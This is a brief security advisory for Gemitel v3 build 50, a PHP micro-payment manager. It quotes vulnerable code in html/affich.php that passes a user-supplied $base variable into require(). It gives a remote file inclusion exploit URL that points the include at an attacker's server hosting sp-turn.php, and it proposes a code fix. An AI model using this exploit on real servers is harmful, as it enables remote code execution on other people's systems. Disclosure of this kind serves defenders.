gemitelv3.txt

`---------------------------------------------------------------------------------------------  
  
  
  
  
GEMITEL V 3 build 50 :: include vulnerability  
  
  
  
URL : http://www.isesam.com/  
FORUM : http://www.isesam.com/forums/gemitel/thread_open.shtml  
Vendor has been contacted.  
  
  
  
  
  
Description :  
---------------  
  
Gemitel is a free software written in php that allows to manage micro payments like allopass, mediapaiement, optelo-Sponsup or Rentabiliweb.  
  
  
  
  
Vulnerability :  
----------------  
  
  
File : html/affich.php  
  
Code:  
*****************************************************************************  
  
$f_inc=$base."sp-turn.php";  
$plus = "../"; // rajoute au chemin pour trouver les fichiers .txt  
require("$f_inc");  
//require("sp-turn.php");  
  
*******************************************************************************  
  
You can include sp-turn.php from where you want by specifying the variable $base.  
  
  
Exploit :  
----------  
  
http://[vulnerable host]/[Gemitel folder]/html/affich.php?base=http://[your server]/  
  
In [your server] you must have a sp-turn.php file which will be included by vulnerable host.  
  
  
  
Solution:  
-----------  
  
Replace :  
  
$f_inc=$base."sp-turn.php";  
$plus = "../"; // rajoute au chemin pour trouver les fichiers .txt  
require("$f_inc");  
//require("sp-turn.php");  
  
By  
  
$f_inc=$base."sp-turn.php";  
$plus = "../"; // rajoute au chemin pour trouver les fichiers .txt  
if(file_exists($f_inc)){require("$f_inc");}  
//require("sp-turn.php");  
  
  
  
`